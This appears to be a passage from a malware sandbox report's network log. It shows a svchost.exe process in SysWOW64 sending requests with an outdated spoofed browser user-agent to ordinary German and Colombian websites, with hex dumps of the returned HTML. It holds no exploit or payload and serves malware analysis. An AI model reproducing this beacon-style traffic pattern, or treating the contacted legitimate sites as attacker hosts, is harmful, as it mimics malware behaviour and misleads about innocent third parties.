                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC514INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:15 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC514INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        32192.168.2.6541705.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC515OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:15 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC516INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC532INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC548INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC564INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        33192.168.2.654202104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC515OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                        Cookie: d55e479f054c94814cbc10d217aaa990=85e4e1a68595ff47778d80e98dbe0065
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC627INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WJpQnok3DWV3twNVQlUh65X4KnoUF0sgObYIrRuZcDcg82ef9Zn9Xn8y2FbKj%2BMe0SyFXc6kum%2FkndIYy%2FVEM%2F1FN2c%2FzMp1Fov3sjmkErLz%2BfYnGMb3kRmeF5NPvHH1z9ClTNOgTrk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a82368b568ec-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC628INData Raw: 37 63 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                        Data Ascii: 7cab<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC628INData Raw: 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2d 63 6f 6d 70 69 6c 65 64 2f 6e 75 63 6c 65 75 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65
                                                                                                                                                                                                                                                                        Data Ascii: les/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/users/nucleus/css-compiled/nucleus.css" rel="stylesheet" /><link href="/te
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC630INData Raw: 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 6a 73 2f 72 6f 6b 62 6f 78 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 62 6f 6f 74
                                                                                                                                                                                                                                                                        Data Ascii: m/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokbox/assets/js/rokbox.js"></script><script src="/media/jui/js/boot
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC631INData Raw: 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                        Data Ascii: /users/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel="shortcut icon" href="/images/favicon.png"></head><body class="
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC632INData Raw: 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 30 34 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e
                                                                                                                                                                                                                                                                        Data Ascii: ck size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-menu-item-type-separator g-menu-item-104 g-parent g-standard ">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC634INData Raw: 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 65 64 69 61 74 72 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c
                                                                                                                                                                                                                                                                        Data Ascii: -item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"> <span class="g-menu-item-content"><span class="g-menu-item-title">Pediatras</span></span></a></li><l
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC635INData Raw: 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e
                                                                                                                                                                                                                                                                        Data Ascii: /li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent=""> <span class="g-separator g-menu-item-content"> <span class="g-men
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC636INData Raw: 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69
                                                                                                                                                                                                                                                                        Data Ascii: s="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu-i
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC638INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72
                                                                                                                                                                                                                                                                        Data Ascii: menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-gr
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC639INData Raw: 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e 20 64 65 20 c3 b3 72 67 61 6e 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c
                                                                                                                                                                                                                                                                        Data Ascii: tainer" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin de rganos </span></span></a><
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC640INData Raw: 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65
                                                                                                                                                                                                                                                                        Data Ascii: m g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></span></a></li><li class="g-menu-ite
